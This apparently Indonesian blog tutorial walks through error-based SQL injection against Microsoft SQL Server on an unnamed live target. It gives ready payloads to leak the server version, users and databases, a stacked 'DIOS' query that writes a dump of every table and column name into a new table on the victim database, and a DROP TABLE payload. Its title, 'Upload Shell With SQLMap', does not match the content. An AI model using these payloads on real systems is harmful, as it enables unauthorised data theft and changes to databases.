Upload Shell With SQLMap

Hii yo yo kembali lagi, setelah kemarin gue ngasih tutorial MSSQL-Injection Union Based, So kali ini gue mau bagiin Tutorial gimana sih caranya Error Based di Microsoft SQL Server ini, mungkin ini sedikit lebih simple daripada Error Based yang biasa digunakan pada MySQL, Lanjut gimana caranya yuk simak kak.

Seperti biasa disini saya sudah memiliki contoh target disini, kita coba check dengan menghitung jumlah table dulu dengan 'Order By' untuk memastikan saja yaa dan ternyata success sebenernya enggak juga gapapa iseng aja hehe, So karena saya malas menggunakan 'Union Based' disini, Lets go kita gunakan Error Based.

Test With Order By

Pertama mari kita check version dengan Error Based dan perhatikan output errornya.

and 1=@@version--+

Maka akan muncul versionnya, Sangat easy bukan? Mudah dan simple Microsoft SQL Server ini dalam Error Based, Buat yang kalian bingung check database, version, user ataupun commenting yang terdapat pada Microsoft SQL Server ini kalian bisa check disini.

Comments
/*
--
;
=======================
Version
SELECT @@version;
SELECT @@VERSION LIKE '%2008%';
========================
User details
SELECT user;
SELECT current_user;
SELECT SYSTEM_USER;
SELECT USER_NAME();
========================
Database details
SELECT DB_NAME();
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;

Lets finished, Berbeda dengan kemarin pada saat DIOS (Dump in One Shoot) disini saya akan menggunakan Update Query untuk melakukan DIOSnya.

/*MSSQL Update Query DIOS*/
;BEGIN DECLARE @a varchar(8000) SET @a='Sebut Saja Milea' SELECT @a=@a%2b%27%20%27%2btable_name%2b%27 :: %27%2bcolumn_name FROM information_schema.columns SELECT @a AS output INTO pixelcode END--+

Nb: Change 'pixelcode' with your name Query.

Loh kok pas DIOS malah redirect ke halaman utama sih kak? Tenang saja itu berarti Query Dios kita sudah masuk, ato ada Output "There is already an object named "NamaDios" in the database" itu juga sudah masuk Query kita, So tinggal kita panggil DIOSnya.

Kalian cukup mudah memanggil Diosnya didalam Error Based MSSQL-Injection ini yaitu dengan output.

and 1=(select output from pixelcode)--+

Nb: Change 'pixelcode' with your name Query.

Dan sudah muncul DIOSnya.

Karena ini yang namanya Update Query pasti juga ada Drop Query dong yaaa, gimana sih kak Drop Querynya? cukup mudah kok kalian cukup menggunakan Drop Table.

; DROP TABLE pixelcode--+

Nb: Change 'pixelcode' with your name Query.

Nah Query DIOS yang sebelumnya sudah hilang bukan? Hal ini kadang bisa kadang enggak ya saat kita akan melakukan Drop Tables dikarenakan permission kamu kurang.

Gimana? cukup mudah bukan Error Based dengan Microsoft SQL Server ini, mudah dimengerti sama halnya dengan MySQL hehe, Oke mungkin cukup sekian tutorial kali ini, Jika tidak bisa di mengerti kalian bisa comment, dont forget too share and see you next time byee~